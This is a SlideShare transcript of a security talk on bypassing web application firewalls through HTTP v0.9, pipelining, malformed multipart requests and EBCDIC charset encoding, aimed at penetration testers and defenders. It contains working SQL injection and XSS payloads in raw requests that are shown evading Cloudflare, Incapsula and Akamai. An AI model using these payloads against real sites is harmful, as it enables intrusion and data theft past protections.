SlideShare a Scribd company logo

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour

Download as pptx, pdf
Soroush Dalili
Soroush Dalili

Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism. Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.

1 of 60
Downloaded 728 times
1
WAF Bypass Techniques Using HTTP Standard and Web Servers’ Behaviour Soroush Dalili (@irsdl), NCC Group
2
Today’s Menu • HTTP smuggling like real smugglers! • Old but forgotten techniques • Eyes watering yummy HTTP requests!
3
Testers’ Nightmare A simple request: “ Could you please whitelist our IP address range for this assessment? ” An unhelpful response: “ You are the hacker, figure it out yourself” Why should we whitelist you? • Not enough time! • Reduces quality • WAF effectiveness test is a separate assessment
4
Where Can I Find Them?
5
Whitelist vs Blacklists Whitelists ✔ • Expensive to set up • Requires application knowledge • High maintenance • Harder to break Blacklists ❌ • Quick & easy to set up • Requires minimal training • Low maintenance • Easier to break
6
Side Note: WAFs in the Cloud The secret is the IP address! wait, what?! • Finding the IP address is not difficult • Historical DNS records, monitoring DNS changes, misconfigured subdomains, non-web service subdomains, SSL certificates, passive IP disclosure issues in web, code, or files, SSRF, trackbacks & pingbacks, verbose errors, debug/troubleshooting headers, enumerating IPv4 ranges, etc. [see the references] • Will be revealed sooner or later • Security via obscurity
7
WAF Bypass Categories • New or missed payloads • Payload mutation and encoding techniques • Finding exceptions • Special values (e.g. headers by “Bypass WAF” Burp Suite extension) • Larger requests • Payload delivery • Request mutation
8
Payload Delivery
9
Payload Delivery Category - Examples • Concurrency and delay • Slow requests • Multiple requests at the same time • Unsupported SSL/TLS ciphers by the WAF • HTTPS and perhaps HTTP/2 • HTTP v0.9 • HTTP-Pipelining
10
HTTP v0.9 • Very old! • Supposedly one liner – only GET • No URL, No HTTP Version, No Headers • Support expectation removed in HTTP/1.1 RFC 7230 Year HTTP Version RFC 1991 0.9 1996 1.0 RFC 1945 1997 1.1 RFC 2068 -> RFC 2616 (1999) -> RFC 7230-7235 (2014) 2015 2.0 RFC 7540
11
HTTP v0.9 , What Can Go Wrong? • Interpretation/implementation issues since it’s old! • Still supported by all major web servers • Absolute URL in GET request with parameters • Apache Tomcat supports headers and POST requests • Inspired further by @regilero at DEFCON 24 (Hiding Wookiees in HTTP) • I was only 1yr late to rediscover some of it, good record for me! ;-) GET http://http.ninja/?param1=value1
12
Sending HTTP v0.9 What to use? • telnet • netcat • openssl • Or write your own program Client side web proxies? Not so useful  • Burp Suite can send it but usually with no response Probably blocked as a bad request by a middleware • HTTP Pipelining to the rescue
13
HTTP Pipelining Pipeline Recipe • HTTP/1.1 • “Connection: close” ❌ • HTTP/1.0 • “Connection: keep-alive” ✔ • Multiple requests in one • FIFO • Hop by Hop 
14
HTTP Pipelining Example 1 - Request
15
HTTP Pipelining Example 2 - Request
Most read
16
HTTP Pipelining – Burp Suite No “Accept-Encoding” to get text, CRLF in the end, mind the “Connection” header
17
HTTP Pipelining + HTTP 0.9 Example 1 “admin” is blocked in the path • HTTP 0.9 has not been disabled • URL encoding and normal HTTP pipelining cannot bypass it (super secure stuff!) • Directory traversal techniques e.g. “/foo/../admin” will not help
18
HTTP Pipelining + HTTP 0.9 Example 2 Abusing Apache Tomcat full header support • Burp Suite adds an additional spacing • CR (0x0D) can be used instead of CR+LF (0x0D+0x0A)
Most read
19
HTTP Pipelining – Python DIY • https://github.com/irsdl/httpninja/blob/master/Generic%20Codes/web_request_socket.py req1_http_1_1 = RequestObject('GET', 'http://asitename.com:8080/sum.jsp?a=1&b=1&c=2&d=2') req2_http_1_0 = RequestObject('POST', 'http://asitename.com:8080/sum.jsp?a=3&b=3', 'c=4&d=4', {'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '7'}, autoContentLength=False, HTTPVersion="HTTP/1.0") req3_http_0_9 = RequestObject('POST', 'http://asitename.com:8080/sum.jsp?a=5&b=5', 'c=6&d=6', {'Content-Type': 'application/x-www-form-urlencoded'}, autoContentLength=True, HTTPVersion="") joinedReqs = [req1_http_1_1, req2_http_1_0, req3_http_0_9] pipelineResult = RequestObjectsToHTTPPipeline(joinedReqs) print pipelineResult print SendHTTPRequestBySocket(pipelineResult, req1_http_1_1.targetName, req1_http_1_1.targetPort)
20
Request Mutation
21
Request Mutation Category Using known & unknowns features! • Requires lots of test-cases, fuzzing, behaviour analysis • Depends on the environment • web servers, web handlers, proxies, etc. • Examples: • Duplicate parameters (HPP) • Path or parameters Evasion • Misshaped Requests
22
Features from RFC Should be known by WAFs… (hopefully by all of them) • Read the boring RFC • Always look for changes in different RFCs • Possible canonical issues • Look for vague statements, "RECOMMENDED", "MAY", and "OPTIONAL“ • e.g.: Line folding in headers (obsoleted by rfc7230) • Multiline headers, starts with CR/LF followed by a horizontal tab or space character! • Example: I’ve used in the past to bypass filtering (not a WAF though) GET /page.do?p1=v1 HTTP/1.1 Host: www.filtered.com
23
Custom Implementation The ones that can actually make a WAF bleed! • Fuzzing is the key • Not standards and are technology specific • Examples: • Parameter blacklist bypass - Python Django • & == ; • Payload bypass - IIS, ASP Classic • <script> == <%s%cr%u0131pt> • Path blacklist bypass - Apache Tomcat • /path1/path2/ == ;/path1;foo/path2;bar/;
24
Content Encoding Abusing the power of “charset” encoding • Can be used in requests not just responses • Useful for ASCII characters • Might corrupt Unicode • Useful for server-side issues • Not possible to use it normally via a browser • Examples: • application/x-www-form-urlencoded;charset=ibm037 • multipart/form-data; charset=ibm037,boundary=blah • multipart/form-data; boundary=blah ; charset=ibm037
25
Request Encoding is Challenging Implemented differently • All at least supports IBM037, IBM500, cp875, and IBM1026 (all very similar) Target QueryString POST Body & and = URL-encoding Nginx, uWSGI - Django - Python3 ✔ ✔ ✔ ❌ Nginx, uWSGI - Django - Python2 ✔ ✔ ❌ ✔ (sometimes required) Apache Tomcat - JSP ❌ ✔ ❌ ✔ (sometimes required) IIS - ASPX (v4.x) ✔ ✔ ❌ ✔ (optional) IIS - ASP classic ❌ ❌ Apache/IIS - PHP ❌ ❌
26
Encoding/Conversion • Similar to a substitution ciphers • Payload: • <script> • IBM037/IBM500/cp875/IBM1026 URL-encoded: • L%A2%83%99%89%97%A3n • Simple Python code: import urllib s = 'Payload Here' print urllib.quote_plus(s.encode("IBM037"))
27
Automating Request Encoding Burp Suite HTTP Smuggler https://github.com/nccgroup/BurpSuiteHTTPSmuggler • Supports request encoding • More to come
28
Example 1: Cloudflare
29
Example 2: ModSecurity
30
ASP.NET Request Validation Bypass 1/5 AntiXSS bypass, limits: • “On error resume next” – or – an empty “catch” around the first read • Ignores the first use (sees an empty string) • Can target GET or POST not both at the same time
31
ASP.NET Request Validation Bypass 2/5 Useful for: • Stored XSS • Validation bypass if (time-of-check time-of-use issue) • It validates an input parameter and an empty string is Ok to go through! • It reads the same input parameter again from GET or POST The twist: • When payload is in QueryString, method should be POST • When payload is in the body, method should be GET (keep the content-type header)
32
ASP.NET Request Validation Bypass 3/5 Exploiting XSS in the POST body as an example: post_param_1=<script>alert(000)</script>&post_param_2=<script>alert(111)</script>
33
ASP.NET Request Validation Bypass 4/5 SQL injection when single quote is not allowed! Using encoding payload would be: ?uid=<foobar>'union all select password from users where uid='admin
34
ASP.NET Request Validation Bypass 5/5 ?uid=<foobar>'union all select password from users where uid='admin
35
How to Stop Request Encoding? Write a new rule • ModSecurity when only “charset=utf-8” is allowed: SecRule REQUEST_HEADERS:Content-Type "@rx (?i)charsets*=s*(?!utf-8)" "id:'1313371',phase:1,t:none,deny,log,msg:'Invalid charset not allowed', logdata:'%{MATCHED_VAR}'" • Incapsula: Content-Type contains "charset" & Content-Type not-contains "charset=utf-8"
36
Test Case Walkthrough Today’s Test Case: IIS 10 ASPX (v4)
37
Today’s Test Case: IIS 10 ASPX (v4) 5 Simple Steps: 1. HTTP verb replacement 2. Changing body type 3. Removing unnecessary parts 4. Adding unused parts 5. Changing request encoding
38
Step 1 – HTTP Verb Replacement • Replacing POST with GET • Works on: • IIS (tested on ASP classic, ASPX, PHP) • Keep the “content-type” header
39
Request A – Obviously Bad (SQLi Payload) POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
40
Request A1 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
41
Step 2 – Changing Body Type • File uploads also use “multipart/form-data” • Works on: • Nginx,uWSGI-Django-Python3 • Nginx,uWSGI-Django-Python2 • Apache-PHP5(mod_php) • Apache-PHP5(FastCGI) • IIS (ASPX, PHP)
42
Request A1 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
43
Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
44
Step 3 – Removing Unnecessary Parts • What if we remove some parts of the body? • Might not be useful if misshaped requests are detected • Removing last “--” in the boundary: • Nginx,uWSGI-Django-Python 2 & 3 • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP) • Removing “form-data;” from the multipart request: • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP)
45
Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
46
Request A3 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: [length of body] --1 Content-Disposition: name="input1" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ❌ Akamai ✔
47
Step 4 – Adding Unused Parts • What if we add some confusing parts? • Additional headers • Duplicated values • Useless stuffs, who cares? • can be useful too • Spacing CR LF after “Content-Disposition:” and before the space • PHP  ASPX 
48
Request A3 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: [length of body] --1 Content-Disposition: name="input1" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ❌ Akamai ✔
49
Request A4 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1,boundary=irsdl Content-Length: [length of body] --1 --1-- --1;--1;header Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ✔ Akamai ✔ Space characters
50
What If, Step 2  Step 4 Now that everything has been bypassed… Jumping from Step 2 (Changing body type) to Step 4 (Adding unused parts)
51
Flashback: Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
52
Request A4+ GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1,boundary=irsdl Content-Length: [length of body] ----1 ----1-- ----1;----1;header Content-Disposition: form-data; name="input1"; filename ="test.jpg" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ✔ Akamai ✔ Space characters
53
Step 5 – Changing Request Encoding • This can bypass most WAFs on its own • What if it detects the “charset”? • Perhaps use “,” rather than “;” for ASPX, or duplicate it, or add additional ignored strings… “application/x-www-form-urlencoded, foobar charset=ibm500 ; charset=utf-8” • Charset value can be quoted too “application/x-www-form-urlencoded, foobar charset="ibm500" ; charset=utf-8”
54
Request A4 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1,boundary=irsdl Content-Length: [length of body] --1 --1-- --1;--1;header Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ✔ Akamai ✔
55
Remember Request A? POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
Most read
56
Request B GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data, foobar charset=ibm500 ;charset=utf-8 ; boundary=1,boundary=irsdl Content-Length: 129 --1 --1-- --1;--1;header Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@@@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 Cloudflare ✔ Incapsula ✔ Akamai ✔
57
Lesson Learned There is always a bypass but at least make it harder • Do not rely only on cloud based WAFs when IP address can be used directly • Do not support HTTP 0.9 – disable it wherever you have a choice • Only accept known charset on incoming requests • Discard malformed HTTP requests • Train the WAF and use whitelists rather than blacklists Whitelist legitimate testers’ IP address during your assessment • But remember to remove the rules afterwards
58
Thank you! Soroush Dalili (@irsdl), NCC Group (@NCCGroupInfosec)
59
References 1/2 • http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf • http://www.ussrback.com/docs/papers/IDS/whiskerids.html • https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON- 24-Regilero-Hiding-Wookiees-In-Http.pdf • https://securityvulns.ru/advisories/content.asp • https://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf • https://cdivilly.wordpress.com/2011/04/22/java-servlets-uri-parameters/ • https://msdn.microsoft.com/en-us/library/system.text.encodinginfo.getencoding.aspx • http://securitee.org/files/cloudpiercer_ccs2015.pdf • https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request- encoding-to-bypass-web-application-firewalls/
60
References 2/2 • https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet- request-validation-bypass-using-request-encoding/ • https://www.rootusers.com/find-the-ip-address-of-a-website-behind-cloudflare/ • https://www.ericzhang.me/resolve-cloudflare-ip-leakage/ • https://community.akamai.com/community/web-performance/blog/2015/03/31/using-akamai- pragma-headers-to-investigate-or-troubleshoot-akamai-content-delivery • https://soroush.secproject.com/blog/2010/08/noscript-new-bypass-method-by-unicode-in-asp/ • https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html
WAF Bypass Techniques Using HTTP Standard and Web Servers’ Behaviour Soroush Dalili (@irsdl), NCC Group
Today’s Menu • HTTP smuggling like real smugglers! • Old but forgotten techniques • Eyes watering yummy HTTP requests!
Testers’ Nightmare A simple request: “ Could you please whitelist our IP address range for this assessment? ” An unhelpful response: “ You are the hacker, figure it out yourself” Why should we whitelist you? • Not enough time! • Reduces quality • WAF effectiveness test is a separate assessment
Where Can I Find Them?
Whitelist vs Blacklists Whitelists ✔ • Expensive to set up • Requires application knowledge • High maintenance • Harder to break Blacklists ❌ • Quick & easy to set up • Requires minimal training • Low maintenance • Easier to break
Side Note: WAFs in the Cloud The secret is the IP address! wait, what?! • Finding the IP address is not difficult • Historical DNS records, monitoring DNS changes, misconfigured subdomains, non-web service subdomains, SSL certificates, passive IP disclosure issues in web, code, or files, SSRF, trackbacks & pingbacks, verbose errors, debug/troubleshooting headers, enumerating IPv4 ranges, etc. [see the references] • Will be revealed sooner or later • Security via obscurity
WAF Bypass Categories • New or missed payloads • Payload mutation and encoding techniques • Finding exceptions • Special values (e.g. headers by “Bypass WAF” Burp Suite extension) • Larger requests • Payload delivery • Request mutation
Payload Delivery
Payload Delivery Category - Examples • Concurrency and delay • Slow requests • Multiple requests at the same time • Unsupported SSL/TLS ciphers by the WAF • HTTPS and perhaps HTTP/2 • HTTP v0.9 • HTTP-Pipelining
HTTP v0.9 • Very old! • Supposedly one liner – only GET • No URL, No HTTP Version, No Headers • Support expectation removed in HTTP/1.1 RFC 7230 Year HTTP Version RFC 1991 0.9 1996 1.0 RFC 1945 1997 1.1 RFC 2068 -> RFC 2616 (1999) -> RFC 7230-7235 (2014) 2015 2.0 RFC 7540
HTTP v0.9 , What Can Go Wrong? • Interpretation/implementation issues since it’s old! • Still supported by all major web servers • Absolute URL in GET request with parameters • Apache Tomcat supports headers and POST requests • Inspired further by @regilero at DEFCON 24 (Hiding Wookiees in HTTP) • I was only 1yr late to rediscover some of it, good record for me! ;-) GET http://http.ninja/?param1=value1
Sending HTTP v0.9 What to use? • telnet • netcat • openssl • Or write your own program Client side web proxies? Not so useful  • Burp Suite can send it but usually with no response Probably blocked as a bad request by a middleware • HTTP Pipelining to the rescue
HTTP Pipelining Pipeline Recipe • HTTP/1.1 • “Connection: close” ❌ • HTTP/1.0 • “Connection: keep-alive” ✔ • Multiple requests in one • FIFO • Hop by Hop 
HTTP Pipelining Example 1 - Request
HTTP Pipelining Example 2 - Request
HTTP Pipelining – Burp Suite No “Accept-Encoding” to get text, CRLF in the end, mind the “Connection” header
HTTP Pipelining + HTTP 0.9 Example 1 “admin” is blocked in the path • HTTP 0.9 has not been disabled • URL encoding and normal HTTP pipelining cannot bypass it (super secure stuff!) • Directory traversal techniques e.g. “/foo/../admin” will not help
HTTP Pipelining + HTTP 0.9 Example 2 Abusing Apache Tomcat full header support • Burp Suite adds an additional spacing • CR (0x0D) can be used instead of CR+LF (0x0D+0x0A)
HTTP Pipelining – Python DIY • https://github.com/irsdl/httpninja/blob/master/Generic%20Codes/web_request_socket.py req1_http_1_1 = RequestObject('GET', 'http://asitename.com:8080/sum.jsp?a=1&b=1&c=2&d=2') req2_http_1_0 = RequestObject('POST', 'http://asitename.com:8080/sum.jsp?a=3&b=3', 'c=4&d=4', {'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '7'}, autoContentLength=False, HTTPVersion="HTTP/1.0") req3_http_0_9 = RequestObject('POST', 'http://asitename.com:8080/sum.jsp?a=5&b=5', 'c=6&d=6', {'Content-Type': 'application/x-www-form-urlencoded'}, autoContentLength=True, HTTPVersion="") joinedReqs = [req1_http_1_1, req2_http_1_0, req3_http_0_9] pipelineResult = RequestObjectsToHTTPPipeline(joinedReqs) print pipelineResult print SendHTTPRequestBySocket(pipelineResult, req1_http_1_1.targetName, req1_http_1_1.targetPort)
Request Mutation
Request Mutation Category Using known & unknowns features! • Requires lots of test-cases, fuzzing, behaviour analysis • Depends on the environment • web servers, web handlers, proxies, etc. • Examples: • Duplicate parameters (HPP) • Path or parameters Evasion • Misshaped Requests
Features from RFC Should be known by WAFs… (hopefully by all of them) • Read the boring RFC • Always look for changes in different RFCs • Possible canonical issues • Look for vague statements, "RECOMMENDED", "MAY", and "OPTIONAL“ • e.g.: Line folding in headers (obsoleted by rfc7230) • Multiline headers, starts with CR/LF followed by a horizontal tab or space character! • Example: I’ve used in the past to bypass filtering (not a WAF though) GET /page.do?p1=v1 HTTP/1.1 Host: www.filtered.com
Custom Implementation The ones that can actually make a WAF bleed! • Fuzzing is the key • Not standards and are technology specific • Examples: • Parameter blacklist bypass - Python Django • & == ; • Payload bypass - IIS, ASP Classic • <script> == <%s%cr%u0131pt> • Path blacklist bypass - Apache Tomcat • /path1/path2/ == ;/path1;foo/path2;bar/;
Content Encoding Abusing the power of “charset” encoding • Can be used in requests not just responses • Useful for ASCII characters • Might corrupt Unicode • Useful for server-side issues • Not possible to use it normally via a browser • Examples: • application/x-www-form-urlencoded;charset=ibm037 • multipart/form-data; charset=ibm037,boundary=blah • multipart/form-data; boundary=blah ; charset=ibm037
Request Encoding is Challenging Implemented differently • All at least supports IBM037, IBM500, cp875, and IBM1026 (all very similar) Target QueryString POST Body & and = URL-encoding Nginx, uWSGI - Django - Python3 ✔ ✔ ✔ ❌ Nginx, uWSGI - Django - Python2 ✔ ✔ ❌ ✔ (sometimes required) Apache Tomcat - JSP ❌ ✔ ❌ ✔ (sometimes required) IIS - ASPX (v4.x) ✔ ✔ ❌ ✔ (optional) IIS - ASP classic ❌ ❌ Apache/IIS - PHP ❌ ❌
Encoding/Conversion • Similar to a substitution ciphers • Payload: • <script> • IBM037/IBM500/cp875/IBM1026 URL-encoded: • L%A2%83%99%89%97%A3n • Simple Python code: import urllib s = 'Payload Here' print urllib.quote_plus(s.encode("IBM037"))
Automating Request Encoding Burp Suite HTTP Smuggler https://github.com/nccgroup/BurpSuiteHTTPSmuggler • Supports request encoding • More to come
Example 1: Cloudflare
Example 2: ModSecurity
ASP.NET Request Validation Bypass 1/5 AntiXSS bypass, limits: • “On error resume next” – or – an empty “catch” around the first read • Ignores the first use (sees an empty string) • Can target GET or POST not both at the same time
ASP.NET Request Validation Bypass 2/5 Useful for: • Stored XSS • Validation bypass if (time-of-check time-of-use issue) • It validates an input parameter and an empty string is Ok to go through! • It reads the same input parameter again from GET or POST The twist: • When payload is in QueryString, method should be POST • When payload is in the body, method should be GET (keep the content-type header)
ASP.NET Request Validation Bypass 3/5 Exploiting XSS in the POST body as an example: post_param_1=<script>alert(000)</script>&post_param_2=<script>alert(111)</script>
ASP.NET Request Validation Bypass 4/5 SQL injection when single quote is not allowed! Using encoding payload would be: ?uid=<foobar>'union all select password from users where uid='admin
ASP.NET Request Validation Bypass 5/5 ?uid=<foobar>'union all select password from users where uid='admin
How to Stop Request Encoding? Write a new rule • ModSecurity when only “charset=utf-8” is allowed: SecRule REQUEST_HEADERS:Content-Type "@rx (?i)charsets*=s*(?!utf-8)" "id:'1313371',phase:1,t:none,deny,log,msg:'Invalid charset not allowed', logdata:'%{MATCHED_VAR}'" • Incapsula: Content-Type contains "charset" & Content-Type not-contains "charset=utf-8"
Test Case Walkthrough Today’s Test Case: IIS 10 ASPX (v4)
Today’s Test Case: IIS 10 ASPX (v4) 5 Simple Steps: 1. HTTP verb replacement 2. Changing body type 3. Removing unnecessary parts 4. Adding unused parts 5. Changing request encoding
Step 1 – HTTP Verb Replacement • Replacing POST with GET • Works on: • IIS (tested on ASP classic, ASPX, PHP) • Keep the “content-type” header
Request A – Obviously Bad (SQLi Payload) POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
Request A1 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
Step 2 – Changing Body Type • File uploads also use “multipart/form-data” • Works on: • Nginx,uWSGI-Django-Python3 • Nginx,uWSGI-Django-Python2 • Apache-PHP5(mod_php) • Apache-PHP5(FastCGI) • IIS (ASPX, PHP)
Request A1 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
Step 3 – Removing Unnecessary Parts • What if we remove some parts of the body? • Might not be useful if misshaped requests are detected • Removing last “--” in the boundary: • Nginx,uWSGI-Django-Python 2 & 3 • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP) • Removing “form-data;” from the multipart request: • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP)
Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
Request A3 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: [length of body] --1 Content-Disposition: name="input1" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ❌ Akamai ✔
Step 4 – Adding Unused Parts • What if we add some confusing parts? • Additional headers • Duplicated values • Useless stuffs, who cares? • can be useful too • Spacing CR LF after “Content-Disposition:” and before the space • PHP  ASPX 
Request A3 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: [length of body] --1 Content-Disposition: name="input1" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ❌ Akamai ✔
Request A4 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1,boundary=irsdl Content-Length: [length of body] --1 --1-- --1;--1;header Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ✔ Akamai ✔ Space characters
What If, Step 2  Step 4 Now that everything has been bypassed… Jumping from Step 2 (Changing body type) to Step 4 (Adding unused parts)
Flashback: Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
Request A4+ GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1,boundary=irsdl Content-Length: [length of body] ----1 ----1-- ----1;----1;header Content-Disposition: form-data; name="input1"; filename ="test.jpg" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ✔ Akamai ✔ Space characters
Step 5 – Changing Request Encoding • This can bypass most WAFs on its own • What if it detects the “charset”? • Perhaps use “,” rather than “;” for ASPX, or duplicate it, or add additional ignored strings… “application/x-www-form-urlencoded, foobar charset=ibm500 ; charset=utf-8” • Charset value can be quoted too “application/x-www-form-urlencoded, foobar charset="ibm500" ; charset=utf-8”
Request A4 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1,boundary=irsdl Content-Length: [length of body] --1 --1-- --1;--1;header Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ✔ Akamai ✔
Remember Request A? POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
Request B GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data, foobar charset=ibm500 ;charset=utf-8 ; boundary=1,boundary=irsdl Content-Length: 129 --1 --1-- --1;--1;header Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@@@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 Cloudflare ✔ Incapsula ✔ Akamai ✔
Lesson Learned There is always a bypass but at least make it harder • Do not rely only on cloud based WAFs when IP address can be used directly • Do not support HTTP 0.9 – disable it wherever you have a choice • Only accept known charset on incoming requests • Discard malformed HTTP requests • Train the WAF and use whitelists rather than blacklists Whitelist legitimate testers’ IP address during your assessment • But remember to remove the rules afterwards
Thank you! Soroush Dalili (@irsdl), NCC Group (@NCCGroupInfosec)
